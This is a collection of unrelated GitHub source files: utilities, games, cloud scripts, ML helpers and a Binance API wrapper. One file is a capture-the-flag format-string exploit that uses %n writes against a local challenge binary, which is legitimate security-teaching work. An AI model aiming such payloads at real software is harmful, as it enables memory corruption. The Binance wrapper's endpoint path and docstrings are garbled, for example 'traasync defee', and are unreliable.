+{"seq_id":"41967530560","text":"import math \ndef Calculate_Distance_Nodes(lat01,lat02,long01,long02):\n R=6378.137 #km\n lat01=float(lat01)\n lat02=float(lat02)\n long01=float(long01)\n long02=float(long02)\n dLat=(lat02-lat01)*(math.pi/180)\n dLong=(long02-long01)*(math.pi/180)\n Lat01torad=lat01*math.pi/180\n Lat02torad=lat02*math.pi/180\n Value_a=math.sin(dLat/2)*math.sin(dLat/2)+math.cos(Lat01torad)*math.cos(Lat02torad)*math.sin(dLong/2)*math.sin(dLong/2)\n Value_b=2*math.atan(math.sqrt(Value_a)/math.sqrt(1-Value_a))\n Distance=R*Value_b\n\n return Distance\ndef Calculate_Distance_Way(latlong): #takes 2 nodes same time and calulate all ways\n Distance_ways = 0\n\n for i in range(1, len(latlong)):\n a = latlong[i - 1]\n b = latlong[i]\n\n lat1 = a['lat']\n lat2 = b['lat']\n long1 = a['long']\n long2 = b['long']\n\n Distance2nodes = Calculate_Distance_Nodes(lat1, lat2, long1, long2)\n Distance_ways += Distance2nodes\n\n return Distance_ways","repo_name":"TrangNhaBui/Openstreetmap-Length-Calculation","sub_path":"Length_Calculation.py","file_name":"Length_Calculation.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"42180748134","text":"from turtle import Turtle\n\n\nclass Paddle(Turtle):\n def __init__(self, position=\"right\"):\n super().__init__()\n self.color(\"white\")\n self.penup()\n self.shape(\"square\")\n self.shapesize(stretch_wid=5, stretch_len=1)\n self.speed(\"fastest\")\n if position == \"left\":\n self.goto(-350, 0)\n else:\n self.goto(350, 0)\n\n def up(self):\n if self.ycor() < 240:\n self.goto(self.xcor(), self.ycor() + 20)\n\n def down(self):\n if self.ycor() > -240:\n self.goto(self.xcor(), self.ycor() - 20)\n\n\n","repo_name":"Aineken/python-projects","sub_path":"days/day 22 - arcade game/paddle.py","file_name":"paddle.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"636786151","text":"import boto3\nimport csv\nimport os\n\ns3_client = boto3.client('s3')\ndynamodb = boto3.resource('dynamodb')\n\ndef lambda_handler(event, context):\n bucket_name = 'your-bucket-name' # Replace with your own bucket name\n file_name = 'your-file-name.csv' # Replace with your own file name\n table_name = 'your-table-name' # Replace with your own table name\n\n # Download the CSV file from S3\n s3_client.download_file(bucket_name, file_name, '/tmp/' + file_name)\n\n # Open the CSV file and parse the data\n with open('/tmp/' + file_name, 'r') as csv_file:\n csv_reader = csv.reader(csv_file)\n next(csv_reader) # Skip the header row\n for row in csv_reader:\n item = {\n 'id': row[0],\n 'name': row[1],\n 'description': row[2],\n 'price': row[3]\n }\n \n # Add the item to the DynamoDB table\n table = dynamodb.Table(table_name)\n table.put_item(Item=item)\n\n # Clean up the temporary file\n os.remove('/tmp/' + file_name)\n\n return {\n 'statusCode': 200,\n 'body': 'Data loaded successfully to DynamoDB table'\n }\n","repo_name":"felvinerepo/MicroService_Team_A","sub_path":"newfileMS1.py","file_name":"newfileMS1.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"71513461607","text":"import SpellShop\nclass Character():\n def __init__(self):\n self.PlayerName = \"Player Name\"\n self.CharName = \"Character Name\"\n self.race = \"DWARF\"\n self.maxhealth = 20\n self.health = 20\n self.gold = 100\n # 1 = Anytime\n # 2 = Movement\n # 3 = Basic Attack\n # 4 = Spell\n self.actions = [3,4,2,1]\n self.stats = []\n self.spells = []\n self.pos_Race = [\"DWARF\", \"ELF\", \"GNOME\",\"CROWN\", \"BEAST\", \"MANDOZIAN\", \"CATHARINES\", \"ENORKANS\", \"XENOKIAN\", \"VESTIAN\", \"SWORD\", \"HERGSOIGISE\"]\n def ChangePlayerName(self, NewName):\n self.PlayerName = NewName\n def ChangeCharacterName(self, NewName):\n self.CharacterName = NewName\n def ChangeHealth(self, amount):\n self.health = self.health + amount\n if self.health > self.maxhealth:\n self.health = self.maxhealth\n if self.health <= 0:\n self.health = 0\n def ChangeRace(self):\n current = self.pos_Race.index(self.race)\n if current+1 > len(self.pos_Race)-1:\n self.race = self.pos_Race[0]\n else:\n self.race = self.pos_Race[current+1]\n def ChangeAction(self, space):\n self.actions[space] = self.actions[space]+1\n if self.actions[space] >4:\n self.actions[space] = 1\n def ChangeGold(self, amount):\n self.gold = self.gold + amount\n def AddSpell(self, SpellName):\n Spells = SpellShop.Shop()\n for i in range(0,len(Spells.SpellList)):\n if Spells.SpellList[i][0] == SpellName:\n self.spells.append(Spells.SpellList[i])\n return None\n def RemoveSpell(self, SpellName):\n for i in range(0,len(self.spells)):\n if self.spells[i][0] == SpellName:\n del self.spells[i]\n return None\n \n","repo_name":"Ghureg/VDND","sub_path":"CharTracker/libs/Char.py","file_name":"Char.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"41470130726","text":"from .EsController import EsController\n\n\nclass EsDumper:\n indices = {\n \"latvia\": {\n \"consulate\": \"latv_cons\",\n \"visaac\": \"latv_visaac\",\n \"news\": \"latv_news\",\n },\n \"poland\": {\"consulate\": \"pol_cons\", \"visaac\": \"pol_visaac\", \"news\": \"pol_news\"},\n \"lithuania\": {\n \"consulate\": \"lith_cons\",\n \"visaac\": \"lith_visaac\",\n \"news\": \"lith_news\",\n },\n \"thailand\": {\n \"consulate\": \"thai_cons\",\n \"visaac\": \"thai_visaac\",\n \"news\": \"thai_news\",\n },\n \"spain\": {\n \"consulate\": \"spain_cons\",\n \"visaac\": \"spain_visaac\",\n \"news\": \"spain_news\",\n },\n }\n\n CONSULATE = \"consulate\"\n VISA_CENTER = \"visaac\"\n NEWS = \"news\"\n\n def __init__(self):\n self.es_controller = EsController()\n\n def add_consulates(self, consulates, index_name):\n for index, consulate in enumerate(consulates):\n self.es_controller.add_data(\n index_name,\n index + 1,\n {\n \"address\": consulate[\"ADRESS\"],\n \"email\": consulate[\"EMAIL\"],\n \"telephone1\": consulate[\"PHONE_NUMBER_1\"],\n \"telephone2\": consulate[\"PHONE_NUMBER_1\"],\n \"worktime\": consulate[\"WORKING_HOURS\"],\n },\n )\n\n def add_visa_centers(self, visa_centers, index_name):\n for index, visa_center in enumerate(visa_centers):\n self.es_controller.add_data(\n index_name,\n index + 1,\n {\n \"address\": visa_center[\"ADRESS\"],\n \"email\": visa_center[\"EMAIL\"],\n \"issue_worktime\": visa_center[\"ISSUE_WORKING_HOURS\"],\n \"apply_worktime\": visa_center[\"APPLY_WORKING_HOURS\"],\n \"telephone1\": visa_center[\"PHONE_NUMBER\"],\n \"telephone2\": \"null\",\n },\n )\n\n def add_news(self, news, index_name):\n for index, news_item in enumerate(news):\n self.es_controller.add_data(\n index_name,\n index + 1,\n {\n \"date\": news_item[\"DATE\"],\n \"title\": news_item[\"TITLE\"],\n \"body\": news_item[\"BODY\"],\n \"link\": news_item[\"LINK\"],\n },\n )\n\n def init_indices(self, data, country):\n [\n self.es_controller.delete_index(index)\n for index in [\n EsDumper.indices[country][\"consulate\"],\n EsDumper.indices[country][\"visaac\"],\n EsDumper.indices[country][\"news\"],\n ]\n ]\n self.add_consulates(data[\"CONSULATE\"], EsDumper.indices[country][\"consulate\"])\n self.add_visa_centers(data[\"VISAAC\"], EsDumper.indices[country][\"visaac\"])\n self.add_news(data[\"NEWS\"], EsDumper.indices[country][\"news\"])\n","repo_name":"svyatjes/visa_app","sub_path":"flask_app/es/EsDumper.py","file_name":"EsDumper.py","file_ext":"py","file_size_in_byte":3027,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"35091586588","text":"import csv\nimport datetime\nimport os\nimport traceback\n\nimport undetected_chromedriver as uc\nfrom selenium.webdriver.common.by import By\nfrom seleniumbase import page_actions\n\nfrom models import BorderCapture, Camera, database\nfrom send_msg import logger, send_to_qu\nfrom utils import retry\n\nRETRY_ATTEMTPS = 5\n\n\n@retry(retries=RETRY_ATTEMTPS)\ndef fetch_image(url, location):\n\n if not url:\n url = os.environ[\"URL\"]\n if not location:\n location = os.environ[\"URL_LOCATION\"]\n\n options = uc.ChromeOptions()\n options.add_argument(\"--no-sandbox\")\n options.add_argument(\"--headless=chrome\")\n options.add_argument(\"--disable-gpu\")\n options.add_argument(\"--disable-dev-shm-usage\")\n driver = uc.Chrome(options=options, driver_executable_path=\"./chromedriver\")\n\n try:\n try:\n # Check the database connection before fetching the image\n database.connect(reuse_if_open=True)\n except:\n logger.error(traceback.format_exc(limit=1))\n raise Exception(\"Database connection can not be established.\")\n\n driver.get(url)\n\n page_actions.wait_for_element(driver, selector=\"videoImage\", by=By.ID)\n\n image = driver.find_element(By.ID, \"videoImage\")\n image_name = str(int(datetime.datetime.utcnow().timestamp())) + \".png\"\n\n image_location = location + \"/\" + image_name\n\n # Save image to folder with a relative location\n image.screenshot(\"./data/\" + image_location)\n\n assert image_name in os.listdir(\"./data/\" + location + \"/\")\n logger.info(\n f\"[parser] Successfuly fetched an image - {image_name} at {location}!\"\n )\n\n camera_id = Camera.get_or_create(location_name=location)[0].id\n\n model = BorderCapture.create(\n camera_id=camera_id,\n image_path=os.getcwd() + \"/data/\" + image_location,\n )\n database.close()\n except Exception as e:\n driver.quit()\n raise e\n driver.quit()\n # ID is of type UUID, thus conversion req.\n return str(model.id)\n\n\nif __name__ == \"__main__\":\n\n with open(\"urls.csv\", \"r\") as f:\n\n sources = csv.reader(f)\n\n for row in sources:\n\n url, location = row\n\n image_id = fetch_image(url, location)\n send_to_qu(image_id)\n","repo_name":"kturaevv/border_guard","sub_path":"parser/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"18282769307","text":"import socket\r\nfrom random import randint\r\n\r\nClientSocket = socket.socket()\r\nhost = '127.0.0.1'\r\nport = 1233\r\n\r\ndef Convert(string):\r\n list1=[]\r\n list1[:0]=string\r\n return list1\r\n\r\nprint('Waiting for connection')\r\ntry:\r\n ClientSocket.connect((host, port))\r\nexcept socket.error as e:\r\n print(str(e))\r\n\r\nResponse = ClientSocket.recv(1024)\r\nprint(Response.decode('utf-8'))\r\n\r\nClientSocket.send(str.encode('Hello from Party 1'))\r\nResponse = ClientSocket.recv(1024)\r\nprint(Response.decode('utf-8'))\r\ndata1 = ClientSocket.recv(4096)\r\nClientSocket.send('OK'.encode())\r\ndata2 = ClientSocket.recv(4096)\r\nClientSocket.send('OK'.encode())\r\nnum1 = ClientSocket.recv(1024)\r\nClientSocket.send('OK'.encode())\r\ndata3 = ClientSocket.recv(4096)\r\n\r\nx1 = []\r\ny1 = []\r\nx2 = []\r\n\r\ndata1 = data1.decode('utf-8')\r\nfor i in range(len(data1)):\r\n if(data1[i]!= ' ' and data1[i]!= ',' and data1[i]!= '[' and data1[i]!= ']' ):\r\n x1.append(int(data1[i]))\r\nprint(x1)\r\n \r\n\r\n\r\n# Convert decoded data into list\r\n\r\ndata2 = data2.decode('utf-8')\r\nfor i in range(len(data2)):\r\n if(data2[i]!= ' ' and data2[i]!= ',' and data2[i]!= '[' and data2[i]!= ']' ):\r\n y1.append(int(data2[i]))\r\nprint(y1)\r\n\r\n\r\ndata3 = data3.decode('utf-8')\r\nfor i in range(len(data3)):\r\n if(data3[i]!= ' ' and data3[i]!= ',' and data3[i]!= '[' and data3[i]!= ']' ):\r\n x2.append(int(data3[i]))\r\nprint(x2)\r\n\r\nstrings1 = num1.decode('utf8')\r\n#get the num\r\nr = int(strings1)\r\n\r\nprint(\"x1 = \", x1, \"y1 = \", y1, \"x2 = \", x2, \"r = \",r)\r\n\r\nprint(len(x1), len(x2), len(y1))\r\na = []\r\n\r\n\r\nfor i in range(r):\r\n x = x1[i]^x2[i]\r\n a.append(x)\r\n\r\nprint(\"a = \", a)\r\n\r\nClientSocket.close()\r\n\r\n","repo_name":"anjali13s/CSP_Project","sub_path":"optimally fair implementation/client1_moran.py","file_name":"client1_moran.py","file_ext":"py","file_size_in_byte":1662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"7082445899","text":"# -*- coding: utf-8 -*-\nfrom typing import Tuple, Union\nfrom typing import Callable\nimport pandas as pd\nimport numpy as np\nfrom src.si.data.dataset import Dataset\nfrom src.si.statisics.f_classification import f_classification\n\n\nclass SelectPercentile:\n\n def __init__(self, percentile: float = 0.25, score_func: Callable = f_classification) -> None:\n self.score_func = score_func\n self.percentile = percentile\n #parametros estimados\n self.F = None\n self.p = None\n\n def fit(self, dataset: Dataset):\n '''\n Estimates the F and p for each feature using the scoring_func\n\n :param dataset: a given dataset\n :return: self\n '''\n\n #estima o F e p para cada feature usando a scoring_func ;\n # retorna o self (ele próprio)\n\n self.F, self.p = self.score_func(dataset)\n\n return self\n\n def transform(self, dataset: Dataset) -> Dataset:\n '''\n Selects the features with the highest F value up to the indicated percentile.\n (for a dataset with 10 features and a 50% percentile, the transform should select\n the 5 features with higher F value)\n\n :param dataset: a given dataset\n :return: dataset\n '''\n\n #seleciona as features com valor de F mais alto até ao\n # percentil indicado. Por exemplo, para um dataset com 10 features e um\n # percentil de 50%, o teu transform deve selecionar as 5 features com valor\n # de F mais alto\n\n #tamanho do dataset\n length = len(dataset.features)\n #tamanho com percentile\n percentile_mask = int(length * self.percentile)\n\n #multiplicação ao longo do eixo /// retorna uma matriz de índices\n ## quanto maior o F, a diferença vai ser mais significativa por isso selecionamos o maior f\n\n # retorna por ordem crescente os index do F,\n #valores mais baixos/vai buscar ao contrario as 10 melhores com o '-'\n idxs = np.argsort(self.F)[-percentile_mask:]\n features = np.array(dataset.features)[idxs]\n\n return Dataset(X=dataset.X[:, idxs], y=dataset.y, features=list(features), label=dataset.label)\n\n def fit_transform(self, dataset: Dataset) -> Dataset:\n '''\n Runs the fit and then the transform\n\n :param dataset: a given dataset\n :return: transformed dataset\n '''\n self.fit(dataset)\n return self.transform(dataset)\n\n\nif __name__ == '__main__':\n percentile = SelectPercentile(0.50)\n dataset = Dataset(X=np.array([[0, 1, 2, 3],\n [0, 2, 4, 6],\n [1, 3, 5, 7]]),\n y=np.array([0, 1, 2]),\n features=[\"f1\", \"f2\", \"f3\", \"f4\"],\n label=\"y\")\n percentile = percentile.fit_transform(dataset)\n print(dataset.features)\n print(percentile.features)","repo_name":"carinaa9/si","sub_path":"src/si/feature_selection/select_percentile.py","file_name":"select_percentile.py","file_ext":"py","file_size_in_byte":2899,"program_lang":"python","lang":"pt","doc_type":"code","dataset":"github-code","pt":"53"}
+{"seq_id":"8798827229","text":"N = int(input())\na = list(map(int,input().split()))\nmod = 998244353\ndp = [[0]*10 for _ in range(N)]\ndp[0][a[0]] = 1\nfor i in range(1,N):\n for j in range(10):\n for k in range(10):\n if (a[i]+k)%10 == j:\n dp[i][j] += dp[i-1][k]%mod\n if (a[i]*k)%10 == j:\n dp[i][j] += dp[i-1][k]%mod\nfor i in range(10):\n print(dp[-1][i]%mod)\n# print(dp)","repo_name":"shimamura10/Atcoder","sub_path":"過去問/単発/220d.py","file_name":"220d.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"74397836967","text":"# @Time : 2018/6/15 17:44\n# @Author : cap\n# @FileName: myGevent.py\n# @Software: PyCharm Community Edition\nimport gevent\nfrom gevent import monkey\n\nmonkey.patch_all()\nfrom socket import *\n\n\ndef handle(c):\n while True:\n data = c.recv(1024).decode()\n if not data:\n break\n else:\n print(data)\n c.send(b'i have received')\n\n\ndef server():\n s = socket()\n s.bind('0.0.0.0', 9000)\n s.listen()\n\n while True:\n c, addr = s.accept()\n print('connect from', addr)\n gevent.spawn(handle, c)\n","repo_name":"zhnin/mypython","sub_path":"modules/gevent/myGevent.py","file_name":"myGevent.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"33516287723","text":"# (c) 2014 Amplify Education, Inc. All rights reserved, subject to the license\n# below.\n#\n# Education agencies that are members of the Smarter Balanced Assessment\n# Consortium as of August 1, 2014 are granted a worldwide, non-exclusive, fully\n# paid-up, royalty-free, perpetual license, to access, use, execute, reproduce,\n# display, distribute, perform and create derivative works of the software\n# included in the Reporting Platform, including the source code to such software.\n# This license includes the right to grant sublicenses by such consortium members\n# to third party vendors solely for the purpose of performing services on behalf\n# of such consortium member educational agencies.\n\nimport csv\nimport argparse\n\n\ndef main(csv_file):\n with open(csv_file, encoding='utf-8') as cfile:\n c_reader = csv.reader(cfile)\n for row in c_reader:\n out_str = [empty_str_to_none(val) for val in row]\n print(tuple(out_str), ',', sep='')\n\n\ndef empty_str_to_none(value):\n '''Convert any empty string to None'''\n if value == '':\n return None\n return value\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser('csv_to_tup')\n parser.add_argument('-c', '--csv_file', help='name of csv file', required=True)\n args = parser.parse_args()\n\n main(args.csv_file)\n","repo_name":"SmarterApp/RDW_DataWarehouse","sub_path":"edudl2/scripts/misc/csv_to_tuple_str.py","file_name":"csv_to_tuple_str.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"}
+{"seq_id":"70315462887","text":"import os\nimport sys\nimport time\nimport argparse\n\nimport numpy as np\nimport tensorflow as tf\n\n\nclass TensorFlowInfer:\n \"\"\"\n Implements TensorFlow inference of a saved model, following the same API as the TensorRTInfer class.\n \"\"\"\n\n def __init__(self, saved_model_path):\n gpus = tf.config.experimental.list_physical_devices('GPU')\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n\n self.model = tf.saved_model.load(saved_model_path)\n self.pred_fn = self.model.signatures['serving_default']\n\n # Setup I/O bindings\n self.batch_size = 1\n self.inputs = []\n fn_inputs = self.pred_fn.structured_input_signature[1]\n for i, input in enumerate(list(fn_inputs.values())):\n self.inputs.append({\n 'index': i,\n 'name': input.name,\n 'dtype': np.dtype(input.dtype.as_numpy_dtype()),\n 'shape': [1, 512, 512, 3], # This can be overridden later\n })\n self.outputs = []\n fn_outputs = self.pred_fn.structured_outputs\n for i, output in enumerate(list(fn_outputs.values())):\n self.outputs.append({\n 'index': i,\n 'name': output.name,\n 'dtype': np.dtype(output.dtype.as_numpy_dtype()),\n 'shape': output.shape.as_list(),\n })\n\n def override_input_shape(self, input, shape):\n self.inputs[input]['shape'] = shape\n self.batch_size = shape[0]\n\n def input_spec(self):\n return self.inputs[0]['shape'], self.inputs[0]['dtype']\n\n def output_spec(self):\n return self.outputs[0]['shape'], self.outputs[0]['dtype']\n\n def infer(self, batch):\n # Process I/O and execute the network\n input = {self.inputs[0]['name']: tf.convert_to_tensor(batch)}\n output = self.pred_fn(**input)\n return output\n\n def process(self, batch, scales=None, nms_threshold=None):\n # Infer network\n output = self.infer(batch)\n\n # Extract the results depending on what kind of saved model this is\n boxes = None\n scores = None\n classes = None\n if len(self.outputs) == 1:\n # Detected as AutoML Saved Model\n assert len(self.outputs[0]['shape']) == 3 and self.outputs[0]['shape'][2] == 7\n results = output[self.outputs[0]['name']].numpy()\n boxes = results[:, :, 1:5]\n scores = results[:, :, 5]\n classes = results[:, :, 6].astype(np.int32)\n elif len(self.outputs) >= 4:\n # Detected as TFOD Saved Model\n assert output['num_detections']\n num = int(output['num_detections'].numpy().flatten()[0])\n boxes = output['detection_boxes'].numpy()[:, 0:num, :]\n scores = output['detection_scores'].numpy()[:, 0:num]\n classes = output['detection_classes'].numpy()[:, 0:num]\n\n # Process the results\n detections = [[]]\n normalized = (np.max(boxes) < 2.0)\n for n in range(scores.shape[1]):\n if scores[0][n] == 0.0:\n break\n scale = self.inputs[0]['shape'][2] if normalized else 1.0\n if scales:\n scale /= scales[0]\n if nms_threshold and scores[0][n] < nms_threshold:\n continue\n detections[0].append({\n 'ymin': boxes[0][n][0] * scale,\n 'xmin': boxes[0][n][1] * scale,\n 'ymax': boxes[0][n][2] * scale,\n 'xmax': boxes[0][n][3] * scale,\n 'score': scores[0][n],\n 'class': int(classes[0][n]) - 1,\n })\n return detections\n\n\ndef main(args):\n print(\"Running in benchmark mode\")\n tf_infer = TensorFlowInfer(args.saved_model)\n input_size = [int(v) for v in args.input_size.split(\",\")]\n assert len(input_size) == 2\n tf_infer.override_input_shape(0, [args.batch_size, input_size[0], input_size[1], 3])\n spec = tf_infer.input_spec()\n batch = 255 * np.random.rand(*spec[0]).astype(spec[1])\n iterations = 200\n times = []\n for i in range(20): # Warmup iterations\n 
tf_infer.infer(batch)\n for i in range(iterations):\n start = time.time()\n tf_infer.infer(batch)\n times.append(time.time() - start)\n print(\"Iteration {} / {}\".format(i + 1, iterations), end=\"\\r\")\n print(\"Benchmark results include TensorFlow host overhead\")\n print(\"Average Latency: {:.3f} ms\".format(\n 1000 * np.average(times)))\n print(\"Average Throughput: {:.1f} ips\".format(\n tf_infer.batch_size / np.average(times)))\n\n print()\n print(\"Finished Processing\")\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-m\", \"--saved_model\", required=True,\n help=\"The TensorFlow saved model path to validate against\")\n parser.add_argument(\"-i\", \"--input_size\", default=\"512,512\",\n help=\"The input size to run the model with, in HEIGHT,WIDTH format\")\n parser.add_argument(\"-b\", \"--batch_size\", default=1, type=int,\n help=\"The batch size to run the model with\")\n args = parser.parse_args()\n main(args)\n","repo_name":"NVIDIA/TensorRT","sub_path":"samples/python/efficientdet/infer_tf.py","file_name":"infer_tf.py","file_ext":"py","file_size_in_byte":5252,"program_lang":"python","lang":"en","doc_type":"code","stars":8187,"dataset":"github-code","pt":"53"}
+{"seq_id":"32805334112","text":"'''\n- Immanuel - 2006463162\n- Pradipta Davi Valendra - 2006462664\n- Tara Mazaya Lababan - 2006473535\n\nPenjelasan:\nPayload berupa format string yang akan mengubah nilai variabel pada stack. \nDiurutkan berdasarkan nilai variable terkecil hingga terbesar.\n'''\nfrom pwn import *\n\nBINARY = ['./chall']\nIP, PORT = 'localhost', 7777\n\np = remote(IP, PORT)\n\npayload = b'%10c%4$n' # ----> nilai variabel (d) akan diubah menjadi 10\npayload += b'%1$5c%5$n' # ----> nilai variabel (e) akan diubah menjadi 10 + 5 = 15\npayload += b'%1$15c%2$n' # ----> nilai variabel (b) akan diubah menjadi 15 + 15 = 30\npayload += b'%1$15c%1$n' # ----> nilai variabel (a) akan diubah menjadi 30 + 15 = 45\npayload += b'A%3$n' # ----> nilai variabel (c) akan diubah menjadi 45 + 1 = 46\n\np.sendline(payload)\nsleep(1)\nprint(p.recv().decode(errors='ignore'))\n","repo_name":"valordra/ctf99_tools","sub_path":"Soal kelompok/kelompok7.py","file_name":"kelompok7.py","file_ext":"py","file_size_in_byte":825,"program_lang":"python","lang":"id","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"75339901608","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport matplotlib \n\n# 设置matplotlib正常显示中文和负号\nmatplotlib.rcParams['font.sans-serif']=['SimHei'] # 用黑体显示中文\nmatplotlib.rcParams['axes.unicode_minus']=False # 正常显示负号\n\ndata=np.loadtxt(\"reject_sampling.txt\")\nplt.hist(data, bins=114,density=True,facecolor=\"blue\", edgecolor=\"black\", alpha=0.7)\n# 显示横轴标签\nplt.xlabel(r\"$x$\")\n# 显示纵轴标签\nplt.ylabel(r\"probability density\")\nplt.show()","repo_name":"kaizewang/Computational_Physics_A","sub_path":"07_data_curve/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"}
+{"seq_id":"36772917392","text":"\r\n# this script will print on the terminal screen the Robot internal battery voltage\r\n# and Cozmo will speak alout the cube's battery percentage capacity remaining.\r\n# I have still to find out at what point the cube batteries fail\r\n# Bob 25th Feb 2018\r\n# This is Version 2 Change is that the internal battery voltage now only reports to 3 decimal places for brevity.\r\n# Bob 04th Mar 2018\r\n\r\n\r\nimport asyncio\r\nimport cozmo\r\nfrom cozmo.objects import LightCube1Id, LightCube2Id, LightCube3Id\r\n\r\nasync def log_cube_info(robot: cozmo.robot.Robot, cube_id):\r\n cube = robot.world.get_light_cube(cube_id)\r\n if cube is not None:\r\n # Wait for up to few seconds for the cube to have received battery level info\r\n for i in range(30):\r\n if cube.battery_voltage is None:\r\n if i == 0:\r\n cozmo.logger.info(\"Cube %s waiting for battery info...\", cube_id)\r\n await asyncio.sleep(0.5)\r\n else:\r\n break\r\n cozmo.logger.info(\"Cube %s battery = %s\", cube_id, cube.battery_str)\r\n #await robot.say_text (\"My internal Battery Voltage Currently is: %s\" % robot.battery_voltage,).wait_for_completed()\r\n await robot.say_text (\"cube %s battery = %s \" %(cube_id, cube.battery_str)).wait_for_completed()\r\n print(\"cube %s battery = %s \" %(cube_id, cube.battery_str))\r\n \r\n else:\r\n \r\n cozmo.logger.warning(\"Cube %s is not connected - check the battery.\", cube_id)\r\n \r\n\r\nasync def cozmo_program(robot: cozmo.robot.Robot):\r\n \r\n print(\"My internal Battery Voltage Currently is: %.3f\" % robot.battery_voltage)\r\n \r\n \r\n \r\n await log_cube_info(robot, LightCube1Id) # looks like a paperclip\r\n await log_cube_info(robot, LightCube2Id) # looks like a lamp / heart\r\n await log_cube_info(robot, LightCube3Id) # looks like the letters 'ab' over 'T'\r\n await robot.say_text (\"My internal Battery Voltage Currently is: %.3f Volts\" % robot.battery_voltage,).wait_for_completed()\r\n\r\ncozmo.robot.Robot.drive_off_charger_on_connect = False\r\n\r\ncozmo.run_program(cozmo_program)\r\n","repo_name":"rsmith21/cozmo","sub_path":"Cube Battery level_working.py","file_name":"Cube Battery level_working.py","file_ext":"py","file_size_in_byte":2117,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"26894002688","text":"from utils.util import (\n check_required_parameter,\n check_required_parameters,\n check_enum_parameter,\n)\n\n\n\nclass SpotWallet:\n async def system_status(self):\n \"\"\"System Status (System)\n Fetch system status.\n\n GET /sapi/v1/system/status\n\n https://binance-docs.github.io/apidocs/spot/en/#system-status-sapi-system\n \"\"\"\n\n return await self.query(\"/sapi/v1/system/status\")\n\n async def coin_info(self, **kwargs):\n \"\"\"All Coins' Information (USER_DATA)\n Get information of coins (available for deposit and withdraw) for user.\n\n GET /sapi/v1/capital/config/getall\n\n https://binance-docs.github.io/apidocs/spot/en/#all-coins-39-information-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/capital/config/getall\", kwargs)\n\n async def account_snapshot(self, type: str, **kwargs):\n \"\"\"Daily Account Snapshot (USER_DATA)\n\n GET /sapi/v1/accountSnapshot\n\n https://binance-docs.github.io/apidocs/spot/en/#daily-account-snapshot-user_data\n\n Parameteres:\n type -- mandatory/string -- \"SPOT\", \"MARGIN\", \"FUTURES\"\n\n Args:\n type (str): \"SPOT\", \"MARGIN\", \"FUTURES\"\n Keyword Args:\n startTime (int, optional)\n endTime (int, optional)\n limit (int, optional): min 7, max 30, async default 7\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n check_required_parameter(type, \"type\")\n payload = {\"type\": type, **kwargs}\n return await self.sign_request(\"GET\", \"/sapi/v1/accountSnapshot\", payload)\n\n async def account_status(self, **kwargs):\n \"\"\"Account Status (USER_DATA)\n Fetch account status detail.\n\n GET /sapi/v1/account/status\n\n https://binance-docs.github.io/apidocs/spot/en/#account-status-sapi-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/account/status\", kwargs)\n\n async def api_trading_status(self, **kwargs):\n \"\"\"Account API Trading Status (USER_DATA)\n Fetch account api trading status detail.\n\n GET /sapi/v1/account/apiTradingStatus\n\n https://binance-docs.github.io/apidocs/spot/en/#account-api-trading-status-sapi-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\n \"GET\", \"/sapi/v1/account/apiTradingStatus\", kwargs\n )\n\n async def asset_detail(self, **kwargs):\n \"\"\"Asset Detail (USER_DATA)\n Fetch details of assets supported on Binance.\n\n GET /sapi/v1/asset/assetDetail\n\n https://binance-docs.github.io/apidocs/spot/en/#asset-detail-sapi-user_data\n\n Keyword Args:\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/asset/assetDetail\", kwargs)\n\n async def trade_fee(self, **kwargs):\n \"\"\"Trade Fee (USER_DATA)\n Fetch trade fee, values in percentage.\n\n GET /sapi/v1/asset/traasync defee\n\n https://binance-docs.github.io/apidocs/spot/en/#trade-fee-sapi-user_data\n\n Keyword Args:\n symbol (str, optional)\n recvWindow (int, optional): The value cannot be greater than 60000\n \"\"\"\n\n return await self.sign_request(\"GET\", \"/sapi/v1/asset/traasync defee\", kwargs)\n\n async def funding_wallet(self, **kwargs):\n \"\"\"Funding Wallet (USER_DATA)\n\n POST /sapi/v1/asset/get-funding-asset\n\n https://binance-docs.github.io/apidocs/spot/en/#funding-wallet-user_data\n\n 
